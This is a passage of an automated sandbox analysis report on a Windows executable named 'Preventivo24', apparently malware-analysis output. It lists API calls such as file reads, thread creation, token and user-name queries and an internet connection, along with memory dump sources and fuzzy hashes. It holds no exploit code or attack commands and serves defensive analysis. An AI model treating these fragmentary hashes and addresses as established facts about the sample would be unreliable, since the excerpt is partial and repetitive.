                                                                              • GetLastError.KERNEL32 ref: 00FE6A0A
                                                                              • GetLastError.KERNEL32 ref: 00FE6656
                                                                                • Part of subcall function 00FC0AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
                                                                                • Part of subcall function 00FC0AF0: GetLastError.KERNEL32(?,00000000), ref: 00FC0B45
                                                                              • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00FE6769
                                                                              • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,00000001), ref: 00FE67C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$File$Read$FormatMessagePointer
                                                                              • String ID:
                                                                              • API String ID: 3903527278-0
                                                                              • Opcode ID: 612692ce080c1aa1ecff72e396c94f2ba20863e63011d7ecc8b6483bbe480043
                                                                              • Instruction ID: 2a9e49ca06e4b97b54574e9c6c787e59a0f81a02b91af380802426c1831e8c55
                                                                              • Opcode Fuzzy Hash: 612692ce080c1aa1ecff72e396c94f2ba20863e63011d7ecc8b6483bbe480043
                                                                              • Instruction Fuzzy Hash: 4702B171D006499FDB04DFA9C945BADFBB5FF58320F148269E825E7381D734AA01CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000,B5580983,00FE411D,?,00000007), ref: 00FE6B87
                                                                              • GetLastError.KERNEL32(?,00000007), ref: 00FE6E45
                                                                              • GetLastError.KERNEL32(?,00000007), ref: 00FE6F06
                                                                              • GetLastError.KERNEL32(?,00000007,?,?,?,?,?,?,?,?,00000000,010FDB42,000000FF,?,00FE587A), ref: 00FE6B96
                                                                                • Part of subcall function 00FC0AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
                                                                                • Part of subcall function 00FC0AF0: GetLastError.KERNEL32(?,00000000), ref: 00FC0B45
                                                                              • ReadFile.KERNEL32(?,00000000,00000008,?,00000000,?,00000007), ref: 00FE6C5A
                                                                              • ReadFile.KERNEL32(?,80070057,00000000,00000000,00000000,00000001,?,00000007), ref: 00FE6CE9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$File$Read$FormatMessagePointer
                                                                              • String ID:
                                                                              • API String ID: 3903527278-0
                                                                              • Opcode ID: 36e4cf7c1900bc2a1708afb038e657812ed347f5579dcdfb032a5be5e8e66032
                                                                              • Instruction ID: d2ed7ac6b5a0042b51f908696306389c20509fe1c98c3bcde98de310efa5e0c9
                                                                              • Opcode Fuzzy Hash: 36e4cf7c1900bc2a1708afb038e657812ed347f5579dcdfb032a5be5e8e66032
                                                                              • Instruction Fuzzy Hash: 5DE1DF71A00249DFDB14DFA8C984BAEB7B5FF18324F144169E815EB382DB34AD06DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0018AA80,0116001C,00000000,?), ref: 00FEBCAD
                                                                              • GetLastError.KERNEL32 ref: 00FEBCBA
                                                                              • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00FEBCE3
                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 00FEBCFD
                                                                              • TerminateThread.KERNEL32(00000000,00000000), ref: 00FEBD15
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FEBD1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleTerminateWait
                                                                              • String ID:
                                                                              • API String ID: 1566822279-0
                                                                              • Opcode ID: 29f6072510f20ff77f3fdde850fbedecb4d815e093d71fcb7f3ce2c03f5d9f43
                                                                              • Instruction ID: 96ba3770981519fdf60917e66ff1593fdbe0b2c9e7e3da2eb93b952e7a5fbe97
                                                                              • Opcode Fuzzy Hash: 29f6072510f20ff77f3fdde850fbedecb4d815e093d71fcb7f3ce2c03f5d9f43
                                                                              • Instruction Fuzzy Hash: B6312974900249DFDB24CF94CA09BEEBBF8FB08324F200669E920B62C0D7759A44CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 01002440: GetUserNameW.ADVAPI32(?,?), ref: 010024BB
                                                                                • Part of subcall function 01002440: GetLastError.KERNEL32 ref: 010024C5
                                                                                • Part of subcall function 01002440: GetUserNameW.ADVAPI32(?,?), ref: 0100250D
                                                                                • Part of subcall function 01002440: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 01002547
                                                                                • Part of subcall function 01002440: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,-00000001,00000000), ref: 01002592
                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,?), ref: 00FD9875
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00FD987C
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00FD98AB
                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00FD98C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentNameProcessTokenUserVariable$ChangeCloseCurrentErrorFindInformationLastNotificationOpen
                                                                              • String ID: \/:*?"<>|
                                                                              • API String ID: 4131070906-3830478854
                                                                              • Opcode ID: cbd959c47a13e45339c6e1c8b31610013dd2e4509d3cd2e561d66a752ea4e38b
                                                                              • Instruction ID: c9fb8705514f13f9c8fb59f34b1933aa1edb48be6af714f171b9a25920639785
                                                                              • Opcode Fuzzy Hash: cbd959c47a13e45339c6e1c8b31610013dd2e4509d3cd2e561d66a752ea4e38b
                                                                              • Instruction Fuzzy Hash: F2C1E030D04249CFCB14EFA8C9547EEBBB2BF15314F28425EE459AB381DBB46A44DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.KERNELBASE(80004005,010BE245,B5580983,?,?,00000000,00000000,?,00000000,010BE245,000000FF,?,80004005,B5580983,?,00000000), ref: 00FC80F5
                                                                              • GetFileVersionInfoW.KERNELBASE(80004005,?,00000000,000000FF,00000000,?,?,00000000,00000000,?,00000000,010BE245,000000FF,?,80004005,B5580983), ref: 00FC8143
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: FileInfoVersion$Size
                                                                              • String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                                              • API String ID: 2104008232-2149928195
                                                                              • Opcode ID: ea3450d6ec64d0e96e1177034402d934eed68557a5ee610795bde2d56240f0d5
                                                                              • Instruction ID: bc9ec1e66fd87fb662efd7c64bcc7be4fb93acd1fe7b6444b76f528061798b43
                                                                              • Opcode Fuzzy Hash: ea3450d6ec64d0e96e1177034402d934eed68557a5ee610795bde2d56240f0d5
                                                                              • Instruction Fuzzy Hash: 1A71A031D0060ADFDB14DFA8C98ABEEBBB4EF04324F18416DE515A7291DB349D06DBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,B5580983,00000000,?), ref: 01009BE0
                                                                              • CreateThread.KERNEL32(00000000,00000000,01009FB0,?,00000000,?), ref: 01009C30
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01009D56
                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 01009D61
                                                                              • CloseHandle.KERNEL32(00000000), ref: 01009D81
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CreateThread$AllocateCloseCodeEventExitHandleHeapObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 978852114-0
                                                                              • Opcode ID: 95f6e65aa80727da2ce917fda1a978f7e109d86e6f38032b5f4d314cc42e4242
                                                                              • Instruction ID: 4d08cb5107fef162215f7e36d0d6d7a3f2f53da4a4ab924e8062817b4d063e67
                                                                              • Opcode Fuzzy Hash: 95f6e65aa80727da2ce917fda1a978f7e109d86e6f38032b5f4d314cc42e4242
                                                                              • Instruction Fuzzy Hash: 82615875A002189FDB19DF58C984BADBBF1FF48314F2541AAE919BB391D730A840CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,01158488,00000001,B5580983,?,0000000A,?,00000000,010F66E5,000000FF), ref: 00FBD1D7
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FBD1E8
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,01158488,00000001,B5580983,?,0000000A,?,00000000,010F66E5,000000FF), ref: 00FBD1FB
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FBD20C
                                                                              • FindNextFileW.KERNEL32(?,?), ref: 00FBD25C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$FindNext
                                                                              • String ID:
                                                                              • API String ID: 3019667586-0
                                                                              • Opcode ID: a6be77c0a60afa46e48340a158527edd79580187e39882b12ba7eadcce8fab6f
                                                                              • Instruction ID: a7a74675fc8e3dc790dc7367ce89f8bb41d3fb5d0445cb304e3750c16765d55c
                                                                              • Opcode Fuzzy Hash: a6be77c0a60afa46e48340a158527edd79580187e39882b12ba7eadcce8fab6f
                                                                              • Instruction Fuzzy Hash: FF51AC30900689DBDB28EF69CD48BEDB7B4FF55320F048229E825972D0EB349A44DF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ResetEvent.KERNEL32(?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC963
                                                                              • InternetConnectW.WININET(00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92), ref: 00FFC986
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC990
                                                                              • WaitForSingleObject.KERNEL32(?,0000000A,?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983), ref: 00FFC9CA
                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC9F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Event$ConnectErrorInternetLastObjectResetSingleWait
                                                                              • String ID:
                                                                              • API String ID: 3866874665-0
                                                                              • Opcode ID: 78d9701caec0bb2fb665bae4371e2accd7d9b558d09660c285745d6843fedbd3
                                                                              • Instruction ID: 36a94c709ff5260c7140a89a502acbeb1663a53855365dd65e9f548a12a3e062
                                                                              • Opcode Fuzzy Hash: 78d9701caec0bb2fb665bae4371e2accd7d9b558d09660c285745d6843fedbd3
                                                                              • Instruction Fuzzy Hash: 2E11E93264075C8FD7308B15D688B27BF95EFA5335F00482EE183D2661C770E888E7A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: FindResource
                                                                              • String ID: \\?\
                                                                              • API String ID: 1635176832-4282027825
                                                                              • Opcode ID: 587f6ae001d4bf7a74ece3c0c8492bb0f4725747aa841280689c529b9526b456
                                                                              • Instruction ID: 321fde570446afeaf6d4e02b0ddcbb847bbc3cc30f36f516f10f346a235146af
                                                                              • Opcode Fuzzy Hash: 587f6ae001d4bf7a74ece3c0c8492bb0f4725747aa841280689c529b9526b456
                                                                              • Instruction Fuzzy Hash: 7D32AC31E00609DFDB18DFA8C848BADB7B6BF44324F18421AE825A73D1DB74A945DF85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • MsgWaitForMultipleObjectsEx.USER32(00000001,000000FF,000000FF,000005FF,00000004), ref: 00FBE667
                                                                              • PeekMessageW.USER32(?,00000000), ref: 00FBE698
                                                                              • TranslateMessage.USER32(00000000), ref: 00FBE6A7
                                                                              • DispatchMessageW.USER32(00000000), ref: 00FBE6B2
                                                                              • MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 00FBE6C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 4084795276-0
                                                                              • Opcode ID: d0a4cfd5b1f7441d4afa358cc21b3d13eedc87f4a0fcbc66bb7647004a4b542a
                                                                              • Instruction ID: 4793583aaa0275e071a5bc6690e7510a9d758649e527b9fbe5848ab9cfad399a
                                                                              • Opcode Fuzzy Hash: d0a4cfd5b1f7441d4afa358cc21b3d13eedc87f4a0fcbc66bb7647004a4b542a
                                                                              • Instruction Fuzzy Hash: 1801D470A493017FFB249F618D49FAB77ACAF58B20F544639F628D10D0EB74D5848B26
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PathIsUNCW.SHLWAPI(00000010,B5580983,?,00000010,?), ref: 00FE2DAE
                                                                                • Part of subcall function 00FB9280: GetCurrentProcess.KERNEL32 ref: 00FB92D2
                                                                                • Part of subcall function 00FB9280: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00FB92DF
                                                                                • Part of subcall function 00FB9280: GetLastError.KERNEL32 ref: 00FB92E9
                                                                                • Part of subcall function 00FB9280: FindCloseChangeNotification.KERNEL32(00000000), ref: 00FB93CC
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Find$ChangeCloseCurrentErrorHeapLastNotificationOpenPathResourceToken
                                                                              • String ID: Extraction path set to:$[WindowsVolume]$\\?\
                                                                              • API String ID: 1213284423-3538578949
                                                                              • Opcode ID: 74394019640cc6c47444f4b4f32b46df4faf3f63119a23111e5deb74f2d40bd0
                                                                              • Instruction ID: bc6f166de2de8932b204d78f3f5c8896ac57473ae0b7682caca48a92b4978f87
